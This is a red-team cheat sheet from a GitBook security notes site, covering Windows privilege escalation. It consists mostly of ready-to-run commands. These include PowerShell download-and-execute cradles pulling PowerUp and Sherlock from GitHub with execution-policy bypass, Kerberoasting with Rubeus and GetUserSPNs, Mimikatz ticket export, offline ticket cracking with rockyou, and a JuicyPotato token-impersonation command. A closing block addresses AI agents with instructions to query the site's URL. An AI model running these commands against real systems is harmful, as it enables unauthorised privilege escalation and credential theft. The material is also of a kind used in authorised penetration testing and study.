# 02 Privileges Escalation {% tabs %} {% tab title="Basic" %} ``` # Rubeus # PowerShellMafia https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks" powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System" powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1'); Invoke-AllChecks -Command 'start powershell.exe'" # Sherlock https://github.com/rasta-mouse/Sherlock powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'" # Unquoted paths wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v ``` {% endtab %} {% tab title="Kerberoast" %} ``` .\.rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234 # List available tickets setspn.exe -t evil.corp -q */* powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1" cscript.exe GetUserSPNs.ps1 # List cached tickets Invoke-Mimikatz -Command '"kerberos::list"' powershell.exe -c "klist" powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'" # Request tickets Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local" # Requesting remotely python GetUserSPNs.py -request ECORP/morph3:supersecurepassword@127.0.0.1 # Extract tickets powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat" Invoke-Mimikatz -Command '"kerberos::list /export"' # Crack Tickets python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi ``` {% endtab %} {% tab title="Juicy Potato" %} ``` https://github.com/ohpe/juicy-potato/releases #Pick one CLSID from here according to your system https://github.com/ohpe/juicy-potato/tree/master/CLSID Required tokens SeAssignPrimaryTokenPrivilege SeImpersonatePrivilege C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34} ``` {% endtab %} {% tab title="Impersonating " %} {% endtab %} {% endtabs %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://calvin-lai.gitbook.io/calvin-lai-security/red-team-windows/02-privileges-escalation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.